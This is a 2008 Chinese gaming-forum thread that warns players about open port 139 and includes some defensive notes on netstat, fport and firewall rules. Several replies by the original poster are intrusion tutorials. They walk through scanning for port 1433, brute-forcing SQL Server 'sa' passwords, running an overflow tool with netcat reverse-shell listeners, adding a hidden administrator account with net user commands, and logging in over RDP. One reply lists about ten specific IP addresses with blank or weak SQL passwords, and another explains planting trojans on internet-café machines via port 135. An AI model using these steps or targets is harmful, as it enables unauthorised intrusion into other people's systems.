独存斑竹进来▲▲▲▲▲▲你们到底懂不懂139端口开放的严重性▲▲▲▲▲▲

社区服务
高级搜索
猴岛论坛DNF地下城与勇士独存斑竹进来▲▲▲▲▲▲你们到底懂不懂139端口开放的严重性▲▲▲▲▲▲
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
« 返回列表
248个回复

独存斑竹进来▲▲▲▲▲▲你们到底懂不懂139端口开放的严重性▲▲▲▲▲▲

 楼层直达
pengbeibei

ZxID:1613596

等级: 少将
灌水是不对 但要分清灌与不灌的区别~!

举报 只看楼主 使用道具 楼主   发表于: 2008-09-26 0
— (独々存) LZ的热情很值得赞赏,netstat -an 命令只是查看,而不是打开端口!所以,多虑了!
(2008-09-26 13:53) —
还以为你们都是高手呢 搞了半天还不是 怪叫人郁闷的!
独存  你搞的那个DNF工作室的外挂你以为很好 呵呵 那是你没被攻击 被攻击你就得哭!
139端口是什么知道吗?小心你的什么东西都被别人窥视 小心吧  把帖子顶起来
让那些不懂的还在那拼命的搞外挂的猴子们停手吧!有个+233的挂就不错了
别再贪心了 小心什么都没得到电脑里的东西确什么都没了!
我就点到为止  如果不信我 我也没办法!!请大家注意了!
独存也是你被别人当靶子了你还不知道你看发帖子那人明显是新手
或者就是看见你发了才加上去 就怕别人不会!希望你能重视一下!!
139端口就是为了黑客能进入才打开的端口 别以为这是好玩的东西!东西被偷完了
你就会后悔了!!如果不信可以去百度搜索一下!!


139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows"文件和打印机共享"和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。
看清楚139端口是干什么的 是共享自己的硬盘的
呵呵你想被别人共享吗?
139端口的攻与防
通过139端口入侵是网络攻击中常见的一种攻击手段,一般情况下139端口开启是由于NetBIOS网络协议的使用。NetBIOS即网络基本输入输出系统,系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址,从而实现信息通讯。在局域网内部使用NetBIOS协议可以非常方便地实现消息通信,但是如果在Internet上,NetBIOS就相当于一个后门程序,很多攻击者都是通过NetBIOS漏洞发起攻击。下面就来介绍一下通过139端口入侵和防范的方法。
139攻击

通过139端口入侵,攻击者首先需要查找网络上存在139端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口扫描工具之一。在SuperScan开始IP地址中输入需要扫描的起始地址,然后在停止中填写好扫描结束的IP地址,然后单击〔开始〕按钮即可开始扫描。扫描结束后,在列表中可以查看目标主机打开的端口,每一个端口后面都有关于这个端口的简短说明。

如果已经查获一台存在139端口漏洞的主机,这时就可以在命令行方式下使用“nbtstat -a [IP地址]”这个命令获得用户的信息情况,并获得攻击主机名称和工作组。接下来攻击者需要做的就是实现与攻击目标资源共享。使用Net View和Net user命令显示计算机列表和共享资源,并使用nbtstat -r和nbtstat -c命令查看具体的用户名和IP地址。

单击Windows桌面〔开始〕按钮,然后执行“查找/计算机”命令,填写刚才查找到的主机名称,就可以找到这台电脑了。双击主机名称即可打开指定的计算机。

防范139攻击

对于139端口攻击的防范针对不同系统的设置也有所不同,下面就来分别描述。

针对使用Windows 9x系统拨号上网用户,可以不必登录到NT局域网络环境,打开控制面板,然后双击“网络”图标,在“主网络登录”中选择“Microsoft友好登录”,不必选择“Windows网络用户”方式。此外,也不必设置“文件打印共享”。

对于Windows NT用户,可以取消NetBIOS与TCP/IP协议的绑定,打开“控制面板”,然后双击“网络”图标,在“NetBIOS接口”中选择“WINS客户(TCP/IP)”为“禁用”,并重新启动计算机即可。

Windows 2000用户可以使用鼠标右键单击“网络邻居”图标,然后选择“属性”命令,打开“网络和拨号连接”对话框,用鼠标右键单击“本地连接”图标,然后执行“属性”命令,打开“本地连接属性”对话框。双击“Internet协议(TCP/IP)”,在打开的对话框中单击〔高级〕按钮。打开“高级TCP/IP设置”对话框,选择“选项”选项卡,在列表中单击选中“TCP/IP筛选”选项。

单击〔属性〕按钮,在“只允许”单击〔添加〕按钮,填入除了139之外要用到的端口。

使用防火墙防范攻击

对于个人上网用户可以使用“天网防火墙”定制防火墙规则。启动“天网个人防火墙”,选择一条空规则,设置数据包方向为“接收”,对方IP地址选“任何地址”,协议设定为“TCP”,本地端口设置为“139到139”,对方端口设置为“0到0”,设置标志位为“SYN”,动作设置为“拦截”,最后单击〔确定〕按钮,并在“自定义IP规则”列表中勾选此规则即可启动拦截139端口攻击了。
斑竹你也说了不会开放 但是你想想查看139端口必须先安装TCP/IP协议
这个就是问题 也许你的以前安装过在网吧还好 
在家里的装这个就是个大大的问题
引用
引用第103楼loveabug于2008-09-26 14:06发表的  :
一直没用.....需要连接外网....这一般都是被盗的前兆!

关心一下吧  还是有人懂那么一点的!
呵呵!连接外网  聪明!·
[ 此贴被pengbeibei在2008-09-26 14:08重新编辑 ]
打赏 收藏 新鲜事

相关主题

  --->﹥·`⑧0後朂閃.℡無與掄仳゛噓..⿴}、﹥>》哥,秂氣指數;′★★★★★★★☆,↗
回复 引用
  鲜花[0]  鸡蛋[0]
pengbeibei

ZxID:1613596

等级: 少将
灌水是不对 但要分清灌与不灌的区别~!

举报 只看该作者 沙发   发表于: 2008-09-26 0
SF  第一个做希望你们重视!!!
  --->﹥·`⑧0後朂閃.℡無與掄仳゛噓..⿴}、﹥>》哥,秂氣指數;′★★★★★★★☆,↗
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
pengbeibei

ZxID:1613596

等级: 少将
灌水是不对 但要分清灌与不灌的区别~!

举报 只看该作者 板凳   发表于: 2008-09-26 0
1.Windows本身自带的netstat命令

关于netstat命令,我们先来看看windows帮助文件中的介绍:

Netstat

显示协议统计和当前的 TCP/IP 网络连接。该命令只有在安装了 TCP/IP 协议后才可以使用。

netstat [-a] [-e] [-n] [-s] [-p protocol] [-r] [interval]

参数

-a -显示所有连接和侦听端口。服务器连接通常不显示。
-e -显示以太网统计。该参数可以与 -s 选项结合使用。
-n -以数字格式显示地址和端口号(而不是尝试查找名称)。
-s -显示每个协议的统计。默认情况下,显示 TCP、UDP、ICMP 和 IP 的统计。-p 选项可以用来指定默认的子集。

-p protocol -显示由 protocol 指定的协议的连接;protocol 可以是 tcp 或 udp。如果与 -s 选项一同使用显示每个协议的统计,protocol 可以是 tcp、udp、icmp 或 ip。

-r -显示路由表的内容。

interval

重新显示所选的统计,在每次显示之间暂停 interval 秒。按 CTRL+B 停止重新显示统计。如果省略该参数,netstat 将打印一次当前的配置信息。

好了,看完这些帮助文件,我们应该明白netstat命令的使用方法了。现在就让我们现学现用,用这个命令看一下自己的机器开放的端口。进入到命令行下,使用netstat命令的a和n两个参数:

C:\>netstat -an

Active Connections

Proto Local Address Foreign Address State

TCP 0.0.0.0:80 0.0.0.0:0 LISTENING

TCP 0.0.0.0:21 0.0.0.0:0 LISTENING

TCP 0.0.0.0:7626 0.0.0.0:0 LISTENING

UDP 0.0.0.0:445 0.0.0.0:0

UDP 0.0.0.0:1046 0.0.0.0:0

UDP 0.0.0.0:1047 0.0.0.0:0

解释一下,Active Connections是指当前本机活动连接,Proto是指连接使用的协议名称,Local Address是本地计算机的 IP 地址和连接正在使用的端口号,Foreign Address是连接该端口的远程计算机的 IP 地址和端口号,State则是表明TCP 连接的状态,你可以看到后面三行的监听端口是UDP协议的,所以没有State表示的状态。看!我的机器的7626端口已经开放,正在监听等待连接,像这样的情况极有可能是已经感染了冰河!急忙断开网络,用杀毒软件查杀病毒是正确的做法。

2.工作在windows2000下的命令行工具fport


使用windows2000的朋友要比使用windows9X的幸运一些,因为可以使用fport这个程序来显示本机开放端口与进程的对应关系。

Fport是FoundStone出品的一个用来列出系统中所有打开的TCP/IP和UDP端口,以及它们对应应用程序的完整路径、PID标识、进程名称等信息的软件。在命令行下使用,请看例子:

D:\>fport.exe

FPort v1.33 - TCP/IP Process to Port Mapper

Copyright 2000 by Foundstone, Inc.

http://www.foundstone.com

Pid Process Port Proto Path

748 tcpsvcs -> 7 TCP C:\WINNT\System32\ tcpsvcs.exe

748 tcpsvcs -> 9 TCP C:\WINNT\System32\tcpsvcs.exe

748 tcpsvcs -> 19 TCP C:\WINNT\System32\tcpsvcs.exe

416 svchost -> 135 TCP C:\WINNT\system32\svchost.exe

是不是一目了然了。这下,各个端口究竟是什么程序打开的就都在你眼皮底下了。如果发现有某个可疑程序打开了某个可疑端口,可千万不要大意哦,也许那就是一只狡猾的木马!

Fport的最新版本是2.0。在很多网站都提供下载,但是为了安全起见,当然最好还是到它的老家去下:点击下载

3.与Fport功能类似的图形化界面工具Active Ports

Active Ports为SmartLine出品,你可以用来监视电脑所有打开的TCP/IP/UDP端口,不但可以将你所有的端口显示出来,还显示所有端口所对应的程序所在的路径,本地IP和远端IP(试图连接你的电脑IP)是否正在活动。

更棒的是,它还提供了一个关闭端口的功能,在你用它发现木马开放的端口时,可以立即将端口关闭。这个软件工作在Windows NT/2000/XP平台下。你可以在http://www.smartline.ru/software/aports.zip得到它。
  --->﹥·`⑧0後朂閃.℡無與掄仳゛噓..⿴}、﹥>》哥,秂氣指數;′★★★★★★★☆,↗
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
pengbeibei

ZxID:1613596

等级: 少将
灌水是不对 但要分清灌与不灌的区别~!

举报 只看该作者 地板   发表于: 2008-09-26 0
scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破(字典是关键)

最后 SQLTools.exe入侵

对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

(以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)


久违的溢出工具

用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。

通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?

先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:\WinNT\system32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。

我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。

首先运行Windows XP自带远程登录器mstsc.exe,填入对方的IP地址218.147.*.*,确定后在登录界面填上我刚创建的用户名hacker和密码12345,顺利地进入了对方的Windows 2000桌面。


218.5.135.66 SQL-Server弱口令: "sa/1234"
218.14.115.111 SQL-Server弱口令: "sa/[空口令]"
218.12.38.52 SQL-Server弱口令: "sa/[空口令]"
218.12.97.14 SQL-Server弱口令: "sa/[空口令]"
218.6.242.228 SQL-Server弱口令: "sa/[空口令]"
222.100.119.3 SQL-Server弱口令: "sa/[空口令]"
222.105.67.200 SQL-Server弱口令: "sa/[空口令]"
222.105.28.130 SQL-Server弱口令: "sa/[空口令]"
222.106.60.51 SQL-Server弱口令: "sa/[空口令]"
222.117.107.1 SQL-Server弱口令: "sa/[空口令]"

在win2000机器上装了mssql的话,机器就会开1433端口。什么 什么是端口?就象食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433端口。溢出1433需要两个工具nc.exe和sql2.exe。进攻方法就两步,在自己机器上开一个cmd窗口。对了,你要用win2000的话就在开始-运行-键入cmd回车就成了饿。这里我们只用2000不说98。如果你把你的下的nc.exe和sql2.exe放在C:盘的话,就在你开的这个窗口打入命令c:>nc -1 -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步:再在开始-运行-键入cmd灰尘,再开个窗口。在这个窗口写入命令c:>sql2.exe你要入侵网站的ip和你自己的ip 40 0回车。这里要作点说明:如何得到入侵网站的ip?在cmd下c:>ping 网址,就行了。自己的ip就不用我说了吧?算了还是说下吧,在cmd下键入ipconfig就可以了。其中命令行中的40你可以随便改成别的,但好象40和53的成功率高一点。再是命令中的0不性的话,你就试试1或2。如果入侵网站有这个漏洞的话,那么你开的第一个窗口就会边成肉鸡的c:>winnt\system32>.就是说,你已经进入它的机器里了。进去以后,你可以添加个拥护了。net user guest /active:yes用这个命令,就将默认禁止的guest拥护激火。net user guest 123456这样guest的密码变成了123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。

呵呵,基本就是这样了,,,,
参考资料:http://www.blog.edu.cn/user1/17098/archives/2006/1473706.shtml
  --->﹥·`⑧0後朂閃.℡無與掄仳゛噓..⿴}、﹥>》哥,秂氣指數;′★★★★★★★☆,↗
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
deadmau5

ZxID:1863359

等级: 上等兵
寂寞在蔓延
举报 只看该作者 4楼  发表于: 2008-09-26 0
不用为妙~~~
Make love with Trance music
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
llshana

ZxID:1810369

等级: 少尉
举报 只看该作者 5楼  发表于: 2008-09-26 0
...无语
生命不息,H不止!
推倒御姐,按住熟女,偶尔人妻,接收LOLI,打倒BL,GL王道,百合莫拜,制服最强!
高举18X理论伟大旗织,坚持H路线一百年不动摇!
声明:本人H绝对纯洁,坚决打到对女性不利的H行为.
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
x860528

ZxID:1684055

等级: 少尉
坚决不用TX任何软件,叫你Y封,擦~

举报 只看该作者 6楼  发表于: 2008-09-26 0
....天书,我已经对DNF彻底放弃,所以不去尝试
※=色界论坛=※
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
yangfan007

ZxID:1625249

等级: 上尉
一直被模仿 从未被超越

举报 只看该作者 7楼  发表于: 2008-09-26 0
这个....
好多......
不以风骚惊天下,但求淫荡动世人!
用爱心征服罗莉,用淫荡引领时尚!
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
pengbeibei

ZxID:1613596

等级: 少将
灌水是不对 但要分清灌与不灌的区别~!

举报 只看该作者 8楼  发表于: 2008-09-26 0
首先你要知道他的IP地址
其次扫描 确定其主机类型 及相关漏洞
然后就是找工具了
比如进路由用webcracker
进2000、2003等WIN主机扫他的3389 1433 135 4899 445 139 等端口 利用管理员的疏忽和无能或者系统自身漏洞去入侵
最后警告:小心网络警察
  --->﹥·`⑧0後朂閃.℡無與掄仳゛噓..⿴}、﹥>》哥,秂氣指數;′★★★★★★★☆,↗
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
5743391

ZxID:1894477

等级: 少将
举报 只看该作者 9楼  发表于: 2008-09-26 0
的确如此.
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
jillnight

ZxID:1889853

等级: 大尉
小心我吃掉你 ~~~~~~~~
举报 只看该作者 10楼  发表于: 2008-09-26 0
楼主说的对  大家还是小心点 !
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
pengbeibei

ZxID:1613596

等级: 少将
灌水是不对 但要分清灌与不灌的区别~!

举报 只看该作者 11楼  发表于: 2008-09-26 0
可以用135入侵的
你可以通过135开telnet传马
一般的网吧都存在这个漏洞的.
用啊D网络工具包扫描192.168.0.1 192.168.2.255这一端IP 服务器一般是windows2000 和windows2003
扫出了接下来就可以传马了..之后想怎么搞就怎么搞
  --->﹥·`⑧0後朂閃.℡無與掄仳゛噓..⿴}、﹥>》哥,秂氣指數;′★★★★★★★☆,↗
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
wzmkukiz

ZxID:1653675

等级: 上校
好喜欢小动物喔!
举报 只看该作者 12楼  发表于: 2008-09-26 0
我正在努力研究为什么自己不拣东西。。。还黑屏。。。
看来放弃微妙
SpawN,CS届永远的明星,瑞典的骄傲,世界的奇迹
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
chaosl

ZxID:1790776

等级: 列兵
举报 只看该作者 13楼  发表于: 2008-09-26 0
顶上去
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
6254978

ZxID:1659972

等级: 中尉
|資料越美.人越墟僞|
举报 只看该作者 14楼  发表于: 2008-09-26 0
不懂啊 。。
梅河口
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
zjh7206

ZxID:1914117

等级: 上等兵
举报 只看该作者 15楼  发表于: 2008-09-26 0
不懂- -好专业啊
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
pengbeibei

ZxID:1613596

等级: 少将
灌水是不对 但要分清灌与不灌的区别~!

举报 只看该作者 16楼  发表于: 2008-09-26 0
139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows"文件和打印机共享"和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。
  --->﹥·`⑧0後朂閃.℡無與掄仳゛噓..⿴}、﹥>》哥,秂氣指數;′★★★★★★★☆,↗
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
wzmkukiz

ZxID:1653675

等级: 上校
好喜欢小动物喔!
举报 只看该作者 17楼  发表于: 2008-09-26 0
可以改其他端口吗?我用的123端口也可以,就是用起来不稳定
SpawN,CS届永远的明星,瑞典的骄傲,世界的奇迹
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
gao2452730

ZxID:1664509

等级: 中校
举报 只看该作者 18楼  发表于: 2008-09-26 0
好用吗 呵呵··
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
⿴{a!M

ZxID:1734633

等级: 准尉
别离 、 深深的伤 、

举报 只看该作者 19楼  发表于: 2008-09-26 0
什么东东??
回复 引用 新鲜事
  鲜花[0]  鸡蛋[0]
« 返回列表
发帖 回复